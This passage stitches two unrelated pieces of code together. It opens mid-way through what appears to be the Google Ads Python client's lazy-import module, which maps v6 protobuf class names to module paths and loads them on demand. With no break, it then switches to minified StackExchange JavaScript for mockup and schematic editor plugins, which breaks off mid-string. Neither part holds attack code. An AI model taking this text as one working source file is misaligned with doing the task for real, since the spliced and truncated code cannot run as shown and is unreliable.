"google.ads.google_ads.v6.proto.enums.parental_status_type_pb2", "ParentalStatusView": "google.ads.google_ads.v6.proto.resources.parental_status_view_pb2", "PartialFailureErrorEnum": "google.ads.google_ads.v6.proto.errors.partial_failure_error_pb2", "PaymentModeEnum": "google.ads.google_ads.v6.proto.enums.payment_mode_pb2", "PaymentsAccount": "google.ads.google_ads.v6.proto.resources.payments_account_pb2", "PaymentsAccountErrorEnum": "google.ads.google_ads.v6.proto.errors.payments_account_error_pb2", "PercentCpc": "google.ads.google_ads.v6.proto.common.bidding_pb2", "PercentCpcBidSimulationPoint": "google.ads.google_ads.v6.proto.common.simulation_pb2", "PercentCpcBidSimulationPointList": "google.ads.google_ads.v6.proto.common.simulation_pb2", "PlaceholderTypeEnum": "google.ads.google_ads.v6.proto.enums.placeholder_type_pb2", "PlacementInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "PlacementTypeEnum": "google.ads.google_ads.v6.proto.enums.placement_type_pb2", "PlannableLocation": "google.ads.google_ads.v6.proto.services.reach_plan_service_pb2", "PlannableTargeting": "google.ads.google_ads.v6.proto.services.reach_plan_service_pb2", "PlannedProduct": "google.ads.google_ads.v6.proto.services.reach_plan_service_pb2", "PlannedProductForecast": "google.ads.google_ads.v6.proto.services.reach_plan_service_pb2", "PlannedProductReachForecast": "google.ads.google_ads.v6.proto.services.reach_plan_service_pb2", "PolicyApprovalStatusEnum": "google.ads.google_ads.v6.proto.enums.policy_approval_status_pb2", "PolicyFindingDetails": "google.ads.google_ads.v6.proto.errors.errors_pb2", "PolicyFindingErrorEnum": "google.ads.google_ads.v6.proto.errors.policy_finding_error_pb2", "PolicyReviewStatusEnum": "google.ads.google_ads.v6.proto.enums.policy_review_status_pb2", "PolicyTopicConstraint": "google.ads.google_ads.v6.proto.common.policy_pb2", "PolicyTopicEntry": "google.ads.google_ads.v6.proto.common.policy_pb2", "PolicyTopicEntryTypeEnum": "google.ads.google_ads.v6.proto.enums.policy_topic_entry_type_pb2", "PolicyTopicEvidence": "google.ads.google_ads.v6.proto.common.policy_pb2", "PolicyTopicEvidenceDestinationMismatchUrlTypeEnum": "google.ads.google_ads.v6.proto.enums.policy_topic_evidence_destination_mismatch_url_type_pb2", "PolicyTopicEvidenceDestinationNotWorkingDeviceEnum": "google.ads.google_ads.v6.proto.enums.policy_topic_evidence_destination_not_working_device_pb2", "PolicyTopicEvidenceDestinationNotWorkingDnsErrorTypeEnum": "google.ads.google_ads.v6.proto.enums.policy_topic_evidence_destination_not_working_dns_error_type_pb2", "PolicyValidationParameter": "google.ads.google_ads.v6.proto.common.policy_pb2", "PolicyValidationParameterErrorEnum": "google.ads.google_ads.v6.proto.errors.policy_validation_parameter_error_pb2", "PolicyViolationDetails": "google.ads.google_ads.v6.proto.errors.errors_pb2", "PolicyViolationErrorEnum": "google.ads.google_ads.v6.proto.errors.policy_violation_error_pb2", "PolicyViolationKey": "google.ads.google_ads.v6.proto.common.policy_pb2", "PositiveGeoTargetTypeEnum": "google.ads.google_ads.v6.proto.enums.positive_geo_target_type_pb2", "Preferences": "google.ads.google_ads.v6.proto.services.reach_plan_service_pb2", "PreferredContentInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "PreferredContentTypeEnum": "google.ads.google_ads.v6.proto.enums.preferred_content_type_pb2", "PriceExtensionPriceQualifierEnum": "google.ads.google_ads.v6.proto.enums.price_extension_price_qualifier_pb2", "PriceExtensionPriceUnitEnum": "google.ads.google_ads.v6.proto.enums.price_extension_price_unit_pb2", "PriceExtensionTypeEnum": "google.ads.google_ads.v6.proto.enums.price_extension_type_pb2", "PriceFeedItem": "google.ads.google_ads.v6.proto.common.extensions_pb2", "PriceOffer": "google.ads.google_ads.v6.proto.common.extensions_pb2", "PricePlaceholderFieldEnum": "google.ads.google_ads.v6.proto.enums.price_placeholder_field_pb2", "ProductAllocation": "google.ads.google_ads.v6.proto.services.reach_plan_service_pb2", "ProductBiddingCategoryConstant": "google.ads.google_ads.v6.proto.resources.product_bidding_category_constant_pb2", "ProductBiddingCategoryInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "ProductBiddingCategoryLevelEnum": "google.ads.google_ads.v6.proto.enums.product_bidding_category_level_pb2", "ProductBiddingCategoryStatusEnum": "google.ads.google_ads.v6.proto.enums.product_bidding_category_status_pb2", "ProductBrandInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "ProductChannelEnum": "google.ads.google_ads.v6.proto.enums.product_channel_pb2", "ProductChannelExclusivityEnum": "google.ads.google_ads.v6.proto.enums.product_channel_exclusivity_pb2", "ProductChannelExclusivityInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "ProductChannelInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "ProductConditionEnum": "google.ads.google_ads.v6.proto.enums.product_condition_pb2", "ProductConditionInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "ProductCustomAttributeIndexEnum": "google.ads.google_ads.v6.proto.enums.product_custom_attribute_index_pb2", "ProductCustomAttributeInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "ProductGroupView": "google.ads.google_ads.v6.proto.resources.product_group_view_pb2", "ProductImage": "google.ads.google_ads.v6.proto.common.ad_type_infos_pb2", "ProductItemIdInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "ProductMetadata": "google.ads.google_ads.v6.proto.services.reach_plan_service_pb2", "ProductTypeInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "ProductTypeLevelEnum": "google.ads.google_ads.v6.proto.enums.product_type_level_pb2", "ProductVideo": "google.ads.google_ads.v6.proto.common.ad_type_infos_pb2", "PromoteCampaignDraftRequest": "google.ads.google_ads.v6.proto.services.campaign_draft_service_pb2", "PromoteCampaignExperimentRequest": "google.ads.google_ads.v6.proto.services.campaign_experiment_service_pb2", "PromotionExtensionDiscountModifierEnum": "google.ads.google_ads.v6.proto.enums.promotion_extension_discount_modifier_pb2", "PromotionExtensionOccasionEnum": "google.ads.google_ads.v6.proto.enums.promotion_extension_occasion_pb2", "PromotionFeedItem": "google.ads.google_ads.v6.proto.common.extensions_pb2", "PromotionPlaceholderFieldEnum": "google.ads.google_ads.v6.proto.enums.promotion_placeholder_field_pb2", "ProximityInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "ProximityRadiusUnitsEnum": "google.ads.google_ads.v6.proto.enums.proximity_radius_units_pb2", "QualityScoreBucketEnum": "google.ads.google_ads.v6.proto.enums.quality_score_bucket_pb2", "QueryErrorEnum": "google.ads.google_ads.v6.proto.errors.query_error_pb2", "QuotaErrorDetails": "google.ads.google_ads.v6.proto.errors.errors_pb2", "QuotaErrorEnum": "google.ads.google_ads.v6.proto.errors.quota_error_pb2", "RangeErrorEnum": "google.ads.google_ads.v6.proto.errors.range_error_pb2", "ReachCurve": "google.ads.google_ads.v6.proto.services.reach_plan_service_pb2", "ReachForecast": "google.ads.google_ads.v6.proto.services.reach_plan_service_pb2", "ReachPlanAdLengthEnum": "google.ads.google_ads.v6.proto.enums.reach_plan_ad_length_pb2", "ReachPlanAgeRangeEnum": "google.ads.google_ads.v6.proto.enums.reach_plan_age_range_pb2", "ReachPlanErrorEnum": "google.ads.google_ads.v6.proto.errors.reach_plan_error_pb2", "ReachPlanNetworkEnum": "google.ads.google_ads.v6.proto.enums.reach_plan_network_pb2", "RealEstatePlaceholderFieldEnum": "google.ads.google_ads.v6.proto.enums.real_estate_placeholder_field_pb2", "RealTimeBiddingSetting": "google.ads.google_ads.v6.proto.common.real_time_bidding_setting_pb2", "Recommendation": "google.ads.google_ads.v6.proto.resources.recommendation_pb2", "RecommendationErrorEnum": "google.ads.google_ads.v6.proto.errors.recommendation_error_pb2", "RecommendationTypeEnum": "google.ads.google_ads.v6.proto.enums.recommendation_type_pb2", "RegenerateShareableLinkIdRequest": "google.ads.google_ads.v6.proto.services.third_party_app_analytics_link_service_pb2", "RegenerateShareableLinkIdResponse": "google.ads.google_ads.v6.proto.services.third_party_app_analytics_link_service_pb2", "RegionCodeErrorEnum": "google.ads.google_ads.v6.proto.errors.region_code_error_pb2", "RemarketingAction": "google.ads.google_ads.v6.proto.resources.remarketing_action_pb2", "RemarketingActionOperation": "google.ads.google_ads.v6.proto.services.remarketing_action_service_pb2", "RemarketingSetting": "google.ads.google_ads.v6.proto.resources.customer_pb2", "RequestErrorEnum": "google.ads.google_ads.v6.proto.errors.request_error_pb2", "ResourceAccessDeniedErrorEnum": "google.ads.google_ads.v6.proto.errors.resource_access_denied_error_pb2", "ResourceChangeOperationEnum": "google.ads.google_ads.v6.proto.enums.resource_change_operation_pb2", "ResourceCountLimitExceededErrorEnum": "google.ads.google_ads.v6.proto.errors.resource_count_limit_exceeded_error_pb2", "ResponseContentTypeEnum": "google.ads.google_ads.v6.proto.enums.response_content_type_pb2", "ResponsiveDisplayAdControlSpec": "google.ads.google_ads.v6.proto.common.ad_type_infos_pb2", "ResponsiveDisplayAdInfo": "google.ads.google_ads.v6.proto.common.ad_type_infos_pb2", "ResponsiveSearchAdInfo": "google.ads.google_ads.v6.proto.common.ad_type_infos_pb2", "RestatementValue": "google.ads.google_ads.v6.proto.services.conversion_adjustment_upload_service_pb2", "RuleBasedUserListInfo": "google.ads.google_ads.v6.proto.common.user_lists_pb2", "RunBatchJobRequest": "google.ads.google_ads.v6.proto.services.batch_job_service_pb2", "RunOfflineUserDataJobRequest": "google.ads.google_ads.v6.proto.services.offline_user_data_job_service_pb2", "SearchEngineResultsPageTypeEnum": "google.ads.google_ads.v6.proto.enums.search_engine_results_page_type_pb2", "SearchGoogleAdsFieldsRequest": "google.ads.google_ads.v6.proto.services.google_ads_field_service_pb2", "SearchGoogleAdsFieldsResponse": "google.ads.google_ads.v6.proto.services.google_ads_field_service_pb2", "SearchGoogleAdsRequest": "google.ads.google_ads.v6.proto.services.google_ads_service_pb2", "SearchGoogleAdsResponse": "google.ads.google_ads.v6.proto.services.google_ads_service_pb2", "SearchGoogleAdsStreamRequest": "google.ads.google_ads.v6.proto.services.google_ads_service_pb2", "SearchGoogleAdsStreamResponse": "google.ads.google_ads.v6.proto.services.google_ads_service_pb2", "SearchTermMatchTypeEnum": "google.ads.google_ads.v6.proto.enums.search_term_match_type_pb2", "SearchTermTargetingStatusEnum": "google.ads.google_ads.v6.proto.enums.search_term_targeting_status_pb2", "SearchTermView": "google.ads.google_ads.v6.proto.resources.search_term_view_pb2", "Segments": "google.ads.google_ads.v6.proto.common.segments_pb2", "ServedAssetFieldTypeEnum": "google.ads.google_ads.v6.proto.enums.served_asset_field_type_pb2", "SettingErrorEnum": "google.ads.google_ads.v6.proto.errors.setting_error_pb2", "SharedCriterion": "google.ads.google_ads.v6.proto.resources.shared_criterion_pb2", "SharedCriterionErrorEnum": "google.ads.google_ads.v6.proto.errors.shared_criterion_error_pb2", "SharedCriterionOperation": "google.ads.google_ads.v6.proto.services.shared_criterion_service_pb2", "SharedSet": "google.ads.google_ads.v6.proto.resources.shared_set_pb2", "SharedSetErrorEnum": "google.ads.google_ads.v6.proto.errors.shared_set_error_pb2", "SharedSetOperation": "google.ads.google_ads.v6.proto.services.shared_set_service_pb2", "SharedSetStatusEnum": "google.ads.google_ads.v6.proto.enums.shared_set_status_pb2", "SharedSetTypeEnum": "google.ads.google_ads.v6.proto.enums.shared_set_type_pb2", "ShoppingComparisonListingAdInfo": "google.ads.google_ads.v6.proto.common.ad_type_infos_pb2", "ShoppingPerformanceView": "google.ads.google_ads.v6.proto.resources.shopping_performance_view_pb2", "ShoppingProductAdInfo": "google.ads.google_ads.v6.proto.common.ad_type_infos_pb2", "ShoppingSmartAdInfo": "google.ads.google_ads.v6.proto.common.ad_type_infos_pb2", "SimilarUserListInfo": "google.ads.google_ads.v6.proto.common.user_lists_pb2", "SimulationModificationMethodEnum": "google.ads.google_ads.v6.proto.enums.simulation_modification_method_pb2", "SimulationTypeEnum": "google.ads.google_ads.v6.proto.enums.simulation_type_pb2", "SiteSeed": "google.ads.google_ads.v6.proto.services.keyword_plan_idea_service_pb2", "SitelinkFeedItem": "google.ads.google_ads.v6.proto.common.extensions_pb2", "SitelinkPlaceholderFieldEnum": "google.ads.google_ads.v6.proto.enums.sitelink_placeholder_field_pb2", "SizeLimitErrorEnum": "google.ads.google_ads.v6.proto.errors.size_limit_error_pb2", "SlotEnum": "google.ads.google_ads.v6.proto.enums.slot_pb2", "SpendingLimitTypeEnum": "google.ads.google_ads.v6.proto.enums.spending_limit_type_pb2", "StoreAttribute": "google.ads.google_ads.v6.proto.common.offline_user_data_pb2", "StoreSalesMetadata": "google.ads.google_ads.v6.proto.common.offline_user_data_pb2", "StoreSalesThirdPartyMetadata": "google.ads.google_ads.v6.proto.common.offline_user_data_pb2", "StringFormatErrorEnum": "google.ads.google_ads.v6.proto.errors.string_format_error_pb2", "StringLengthErrorEnum": "google.ads.google_ads.v6.proto.errors.string_length_error_pb2", "StructuredSnippetFeedItem": "google.ads.google_ads.v6.proto.common.extensions_pb2", "StructuredSnippetPlaceholderFieldEnum": "google.ads.google_ads.v6.proto.enums.structured_snippet_placeholder_field_pb2", "SuggestGeoTargetConstantsRequest": "google.ads.google_ads.v6.proto.services.geo_target_constant_service_pb2", "SuggestGeoTargetConstantsResponse": "google.ads.google_ads.v6.proto.services.geo_target_constant_service_pb2", "SummaryRowSettingEnum": "google.ads.google_ads.v6.proto.enums.summary_row_setting_pb2", "SystemManagedResourceSourceEnum": "google.ads.google_ads.v6.proto.enums.system_managed_entity_source_pb2", "TagSnippet": "google.ads.google_ads.v6.proto.common.tag_snippet_pb2", "TargetCpa": "google.ads.google_ads.v6.proto.common.bidding_pb2", "TargetCpaOptInRecommendationGoalEnum": "google.ads.google_ads.v6.proto.enums.target_cpa_opt_in_recommendation_goal_pb2", "TargetCpaSimulationPoint": "google.ads.google_ads.v6.proto.common.simulation_pb2", "TargetCpaSimulationPointList": "google.ads.google_ads.v6.proto.common.simulation_pb2", "TargetCpm": "google.ads.google_ads.v6.proto.common.bidding_pb2", "TargetImpressionShare": "google.ads.google_ads.v6.proto.common.bidding_pb2", "TargetImpressionShareLocationEnum": "google.ads.google_ads.v6.proto.enums.target_impression_share_location_pb2", "TargetRestriction": "google.ads.google_ads.v6.proto.common.targeting_setting_pb2", "TargetRestrictionOperation": "google.ads.google_ads.v6.proto.common.targeting_setting_pb2", "TargetRoas": "google.ads.google_ads.v6.proto.common.bidding_pb2", "TargetRoasSimulationPoint": "google.ads.google_ads.v6.proto.common.simulation_pb2", "TargetRoasSimulationPointList": "google.ads.google_ads.v6.proto.common.simulation_pb2", "TargetSpend": "google.ads.google_ads.v6.proto.common.bidding_pb2", "Targeting": "google.ads.google_ads.v6.proto.services.reach_plan_service_pb2", "TargetingDimensionEnum": "google.ads.google_ads.v6.proto.enums.targeting_dimension_pb2", "TargetingSetting": "google.ads.google_ads.v6.proto.common.targeting_setting_pb2", "TextAdInfo": "google.ads.google_ads.v6.proto.common.ad_type_infos_pb2", "TextAsset": "google.ads.google_ads.v6.proto.common.asset_types_pb2", "TextLabel": "google.ads.google_ads.v6.proto.common.text_label_pb2", "TextMessageFeedItem": "google.ads.google_ads.v6.proto.common.extensions_pb2", "ThirdPartyAppAnalyticsLink": "google.ads.google_ads.v6.proto.resources.third_party_app_analytics_link_pb2", "ThirdPartyAppAnalyticsLinkErrorEnum": "google.ads.google_ads.v6.proto.errors.third_party_app_analytics_link_error_pb2", "ThirdPartyAppAnalyticsLinkIdentifier": "google.ads.google_ads.v6.proto.resources.account_link_pb2", "TimeTypeEnum": "google.ads.google_ads.v6.proto.enums.time_type_pb2", "TimeZoneErrorEnum": "google.ads.google_ads.v6.proto.errors.time_zone_error_pb2", "TopicConstant": "google.ads.google_ads.v6.proto.resources.topic_constant_pb2", "TopicInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "TopicView": "google.ads.google_ads.v6.proto.resources.topic_view_pb2", "TrackingCodePageFormatEnum": "google.ads.google_ads.v6.proto.enums.tracking_code_page_format_pb2", "TrackingCodeTypeEnum": "google.ads.google_ads.v6.proto.enums.tracking_code_type_pb2", "TransactionAttribute": "google.ads.google_ads.v6.proto.common.offline_user_data_pb2", "TravelPlaceholderFieldEnum": "google.ads.google_ads.v6.proto.enums.travel_placeholder_field_pb2", "UnknownListingDimensionInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "UploadCallConversionsRequest": "google.ads.google_ads.v6.proto.services.conversion_upload_service_pb2", "UploadCallConversionsResponse": "google.ads.google_ads.v6.proto.services.conversion_upload_service_pb2", "UploadClickConversionsRequest": "google.ads.google_ads.v6.proto.services.conversion_upload_service_pb2", "UploadClickConversionsResponse": "google.ads.google_ads.v6.proto.services.conversion_upload_service_pb2", "UploadConversionAdjustmentsRequest": "google.ads.google_ads.v6.proto.services.conversion_adjustment_upload_service_pb2", "UploadConversionAdjustmentsResponse": "google.ads.google_ads.v6.proto.services.conversion_adjustment_upload_service_pb2", "UploadUserDataRequest": "google.ads.google_ads.v6.proto.services.user_data_service_pb2", "UploadUserDataResponse": "google.ads.google_ads.v6.proto.services.user_data_service_pb2", "UrlCollection": "google.ads.google_ads.v6.proto.common.url_collection_pb2", "UrlFieldErrorEnum": "google.ads.google_ads.v6.proto.errors.url_field_error_pb2", "UrlSeed": "google.ads.google_ads.v6.proto.services.keyword_plan_idea_service_pb2", "UserAttribute": "google.ads.google_ads.v6.proto.common.offline_user_data_pb2", "UserData": "google.ads.google_ads.v6.proto.common.offline_user_data_pb2", "UserDataErrorEnum": "google.ads.google_ads.v6.proto.errors.user_data_error_pb2", "UserDataOperation": "google.ads.google_ads.v6.proto.services.user_data_service_pb2", "UserIdentifier": "google.ads.google_ads.v6.proto.common.offline_user_data_pb2", "UserIdentifierSourceEnum": "google.ads.google_ads.v6.proto.enums.user_identifier_source_pb2", "UserInterest": "google.ads.google_ads.v6.proto.resources.user_interest_pb2", "UserInterestInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "UserInterestTaxonomyTypeEnum": "google.ads.google_ads.v6.proto.enums.user_interest_taxonomy_type_pb2", "UserList": "google.ads.google_ads.v6.proto.resources.user_list_pb2", "UserListAccessStatusEnum": "google.ads.google_ads.v6.proto.enums.user_list_access_status_pb2", "UserListActionInfo": "google.ads.google_ads.v6.proto.common.user_lists_pb2", "UserListClosingReasonEnum": "google.ads.google_ads.v6.proto.enums.user_list_closing_reason_pb2", "UserListCombinedRuleOperatorEnum": "google.ads.google_ads.v6.proto.enums.user_list_combined_rule_operator_pb2", "UserListCrmDataSourceTypeEnum": "google.ads.google_ads.v6.proto.enums.user_list_crm_data_source_type_pb2", "UserListDateRuleItemInfo": "google.ads.google_ads.v6.proto.common.user_lists_pb2", "UserListDateRuleItemOperatorEnum": "google.ads.google_ads.v6.proto.enums.user_list_date_rule_item_operator_pb2", "UserListErrorEnum": "google.ads.google_ads.v6.proto.errors.user_list_error_pb2", "UserListInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "UserListLogicalRuleInfo": "google.ads.google_ads.v6.proto.common.user_lists_pb2", "UserListLogicalRuleOperatorEnum": "google.ads.google_ads.v6.proto.enums.user_list_logical_rule_operator_pb2", "UserListMembershipStatusEnum": "google.ads.google_ads.v6.proto.enums.user_list_membership_status_pb2", "UserListNumberRuleItemInfo": "google.ads.google_ads.v6.proto.common.user_lists_pb2", "UserListNumberRuleItemOperatorEnum": "google.ads.google_ads.v6.proto.enums.user_list_number_rule_item_operator_pb2", "UserListOperation": "google.ads.google_ads.v6.proto.services.user_list_service_pb2", "UserListPrepopulationStatusEnum": "google.ads.google_ads.v6.proto.enums.user_list_prepopulation_status_pb2", "UserListRuleInfo": "google.ads.google_ads.v6.proto.common.user_lists_pb2", "UserListRuleItemGroupInfo": "google.ads.google_ads.v6.proto.common.user_lists_pb2", "UserListRuleItemInfo": "google.ads.google_ads.v6.proto.common.user_lists_pb2", "UserListRuleTypeEnum": "google.ads.google_ads.v6.proto.enums.user_list_rule_type_pb2", "UserListSizeRangeEnum": "google.ads.google_ads.v6.proto.enums.user_list_size_range_pb2", "UserListStringRuleItemInfo": "google.ads.google_ads.v6.proto.common.user_lists_pb2", "UserListStringRuleItemOperatorEnum": "google.ads.google_ads.v6.proto.enums.user_list_string_rule_item_operator_pb2", "UserListTypeEnum": "google.ads.google_ads.v6.proto.enums.user_list_type_pb2", "UserLocationView": "google.ads.google_ads.v6.proto.resources.user_location_view_pb2", "Value": "google.ads.google_ads.v6.proto.common.value_pb2", "VanityPharmaDisplayUrlModeEnum": "google.ads.google_ads.v6.proto.enums.vanity_pharma_display_url_mode_pb2", "VanityPharmaTextEnum": "google.ads.google_ads.v6.proto.enums.vanity_pharma_text_pb2", "Video": "google.ads.google_ads.v6.proto.resources.video_pb2", "VideoAdInfo": "google.ads.google_ads.v6.proto.common.ad_type_infos_pb2", "VideoBumperInStreamAdInfo": "google.ads.google_ads.v6.proto.common.ad_type_infos_pb2", "VideoNonSkippableInStreamAdInfo": "google.ads.google_ads.v6.proto.common.ad_type_infos_pb2", "VideoOutstreamAdInfo": "google.ads.google_ads.v6.proto.common.ad_type_infos_pb2", "VideoResponsiveAdInfo": "google.ads.google_ads.v6.proto.common.ad_type_infos_pb2", "VideoTrueViewDiscoveryAdInfo": "google.ads.google_ads.v6.proto.common.ad_type_infos_pb2", "VideoTrueViewInStreamAdInfo": "google.ads.google_ads.v6.proto.common.ad_type_infos_pb2", "WebhookDelivery": "google.ads.google_ads.v6.proto.common.asset_types_pb2", "WebpageConditionInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "WebpageConditionOperandEnum": "google.ads.google_ads.v6.proto.enums.webpage_condition_operand_pb2", "WebpageConditionOperatorEnum": "google.ads.google_ads.v6.proto.enums.webpage_condition_operator_pb2", "WebpageInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "YouTubeChannelInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "YouTubeVideoInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "YoutubeVideoAsset": "google.ads.google_ads.v6.proto.common.asset_types_pb2", "YoutubeVideoRegistrationErrorEnum": "google.ads.google_ads.v6.proto.errors.youtube_video_registration_error_pb2", } DEPENDENT_MODULE_LIST = [ "google.longrunning.operations_pb2", "google.protobuf.any_pb2", "google.protobuf.empty_pb2", "google.protobuf.field_mask_pb2", "google.protobuf.wrappers_pb2", "google.rpc.status_pb2", ] def _get_class_from_module(module_name): module = importlib.import_module(module_name) for class_name in get_messages(module).keys(): # from inspect module yield class_name def _populate_dependent_classes(module_list=DEPENDENT_MODULE_LIST): class_list = {} for module_name in module_list: for cls in _get_class_from_module(module_name): class_list[cls] = module_name return class_list _lazy_dependent_class_to_package_map = _populate_dependent_classes() def _load_module(module_name): """Load a module by it's name. Args: module_name: a str of the name of a sub-module to load. Returns: A module class instance. Raises: AttributeError if the given module can't be found. """ try: if module_name in _lazy_name_to_package_map: module_path = ( f"{_lazy_name_to_package_map[module_name]}.{module_name}" ) else: module_path = module_name return importlib.import_module(module_path) except KeyError: raise AttributeError(f"unknown sub-module {module_name!r}.") def _get_module_by_name(module_name): """Get a module containing one or more message classes. For example: google.ads.google_ads.v2.proto.services.video_service_pb2. Args: module_name: a str of the name of a module. Returns: a module class instance. """ module = _load_module(module_name) globals()[module_name] = module for name, message in get_messages(module).items(): if name.endswith("_service_pb2"): message.__module__ = "google.ads.google_ads.v2.types" globals()[name] = message return module def _get_message_class_by_name(class_name): """Get a message class instance by name. For example: VideoService Args: module_name: a str of the name of a protobuf class to load. Returns: a protobuf message class definition that inherits from google.protobuf.pyext.cpp_message.GeneratedProtocolMessageType. """ if class_name in _lazy_dependent_class_to_package_map: module_path = _lazy_dependent_class_to_package_map[class_name] elif class_name in _lazy_class_to_package_map: module_path = _lazy_class_to_package_map[class_name] else: raise AttributeError(f"unknown sub-module {class_name!r}.") try: module = _load_module(module_path) message = getattr(module, class_name) except AttributeError: raise AttributeError(f"unknown message class {class_name!r}.") if class_name.endswith("Service"): message.__module__ = "google.ads.google_ads.v2.types" globals()[class_name] = message return message # Background on how this behaves: https://www.python.org/dev/peps/pep-0562/ def __getattr__(name): # Requires Python >= 3.7 """Lazily perform imports and class definitions on first demand.""" if name == "__all__": converted = ( util.convert_snake_case_to_upper_case(key) for key in chain( _lazy_name_to_package_map, _lazy_class_to_package_map, _lazy_dependent_class_to_package_map, ) ) all_names = sorted(converted) globals()["__all__"] = all_names return all_names elif name.endswith("_pb2"): return _get_module_by_name(name) elif name.endswith("Pb2"): module_name = f"{util.convert_upper_case_to_snake_case(name)}" return _get_module_by_name(module_name) else: return _get_message_class_by_name(name) def __dir__(): return globals().get("__all__") or __getattr__("__all__") if not sys.version_info >= (3, 7): from pep562 import Pep562 Pep562(__name__)
"use strict";StackExchange.mockups=function(){function e(e,t,n,i,r){function a(e,t,n){for(var i=-1,r=-1;;){if(r=t.indexOf(e,r+1),-1==r)break;(0>i||Math.abs(r-n)<Math.abs(r-i))&&(i=r)}return i}return e.replace(new RegExp("<!-- Begin mockup[^>]*? -->\\s*!\\[[^\\]]*\\]\\((http://[^ )]+)[^)]*\\)\\s*<!-- End mockup -->","g"),function(e,o,s){var l={"payload":o.replace(/[^-A-Za-z0-9+&@#\/%?=~_|!:,.;\(\)]/g,""),"pos":a(e,t,s),"len":e.length};return-1===l.pos?e:(r.push(l),e+"\n\n"+n+i+"-"+(r.length-1)+"%")})}function t(){StackExchange.externalEditor.init({"thingName":"mockup","thingFinder":e,"getIframeUrl":function(e){var t="/plugins/mockups/editor";return e&&(t+="?edit="+encodeURIComponent(e)),t},"buttonTooltip":"UI wireframe","buttonImageUrl":"/content/Shared/Balsamiq/wmd-mockup-button.png","onShow":function(e){window.addMockupToEditor=e},"onRemove":function(){window.addMockupToEditor=null;try{delete window.addMockupToEditor}catch(e){}}})}return{"init":t}}(),StackExchange.schematics=function(){function e(){if(!window.postMessage)return i;var e=document.createElement("div");e.innerHTML="<svg/>";var t="http://www.w3.org/2000/svg"==(e.firstChild&&e.firstChild.namespaceURI);if(!t)return i;var n=navigator.userAgent;return/Firefox|Chrome/.test(n)?o:/Apple/.test(navigator.vendor)||/Opera/.test(n)?a:r}function t(e,t,n,i,r){function a(e,t,n){for(var i=-1,r=-1;;){if(r=t.indexOf(e,r+1),-1==r)break;(0>i||Math.abs(r-n)<Math.abs(r-i))&&(i=r)}return i}return e.replace(new RegExp("<!-- Begin schematic[^>]*? -->\\s*!\\[[^\\]]*\\]\\((http://[^ )]+)[^)]*\\)\\s*<!-- End schematic -->","g"),function(e,o,s){var l={"payload":o.replace(/[^-A-Za-z0-9+&@#\/%?=~_|!:,.;\(\)]/g,""),"pos":a(e,t,s),"len":e.length};return-1===l.pos?e:(r.push(l),e+"\n\n"+n+i+"-"+(r.length-1)+"%")})}function n(){var n;StackExchange.externalEditor.init({"thingName":"schematic","thingFinder":t,"getIframeUrl":function(e){var t="/plugins/schematics/editor";return e&&(t+="?edit="+encodeURIComponent(e)),t},"buttonTooltip":"Schematic","buttonImageUrl":"/content/Sites/electronics/img/wmd-schematic-button.png?v=1","checkSupport":function(){var t=e();switch(t){case o:return!0;case a:return confirm("Your browser is not officially supported by the schematics editor; however it has been reported to work. Launch the editor?");case r:return confirm("Your browser is not officially supported by the schematics editor; it may or may not work. Launch the editor anyway?");case i:return alert("Sorry, your browser does not support all the necessary features for the schematics editor."),!1}},"onShow":function(e){var t=$("<div class='popup' />").css("z-index",1111).text("Loading editor").appendTo("body").show().addSpinner({"marginLeft":5}).center({"dy":-200});$("<div style='text-align:right;margin-top: 10px' />").append($("<button>cancel</button>").click(function(){t.remove(),e()})).appendTo(t),n=function(n){if(n=n.originalEvent,"https://www.circuitlab.com"===n.origin){n.data||e();var i=$.parseJSON(n.data);if(i&&"success"===i.load)return t.remove(),void 0;if(i&&i.edit_url&&i.image_url){i.fkey=StackExchange.options.user.fkey;var r=$("<div class='popup' />").css("z-index",1111).appendTo("body").show(),a=function(){r.text("Storing image").addSpinner({"marginLeft":5}).center(),$.post("/plugins/schematics/save",i).done(function(t){r.remove(),e(t.img)}).fail(function(e){if(409===e.status){var t="Storing aborted";e.responseText.length<200&&(t=e.responseText),r.text(t+", will retry shortly").addSpinner({"marginLeft":5}).center(),setTimeout(a,1e4)}else r.remove(),alert("Failed to upload the schematic image.")})};a()}}},$(window).on("message",n)},"onRemove":function(){$(window).off("message",n)}})}var i=0,r=1,a=2,o=3;return{"init":n}}(),StackExchange.externalEditor=function(){function e(e){function t(e,t){function f(t){function i(){StackExchange.helpers.closePopups(v.add(r)),d()}var r,s=g||x.caret(),l=x[0].value||"",u=t?t.pos:s.start,p=t?t.len:s.end-s.start,f=l.substring(0,u),h=l.substring(u+p);g=null;var m=function(t,r){if(!t)return setTimeout(i,0),x.focus(),void 0;StackExchange.navPrevention.start();var a=void 0===r?n(t):r,o=f.replace(/(?:\r\n|\r|\n){1,2}$/,""),l=o+a+h.replace(/^(?:\r\n|\r|\n){1,2}/,""),c=s.start+a.length-f.length+o.length;setTimeout(function(){e.textOperation(function(){x.val(l).focus().caret(c,c)}),i()},0)},v=null;if(a){var b=a(t?t.payload:null);v=$("<iframe>",{"src":b})}else{var k=o(t?t.payload:null);v=$(k)}v.addClass("esc-remove").css({"position":"fixed","top":"2.5%","left":"2.5%","width":"95%","height":"95%","background":"white","z-index":1001}),$("body").loadPopup({"html":v,"target":$("body"),"lightbox":!0}).done(function(){$(window).resize(),c(m)})}$('<style type="text/css"> .wmd-'+i+"-button span { background-position: 0 0; } .wmd-"+i+"-button:hover span { background-position: 0 -40px; }</style>)").appendTo("head");var 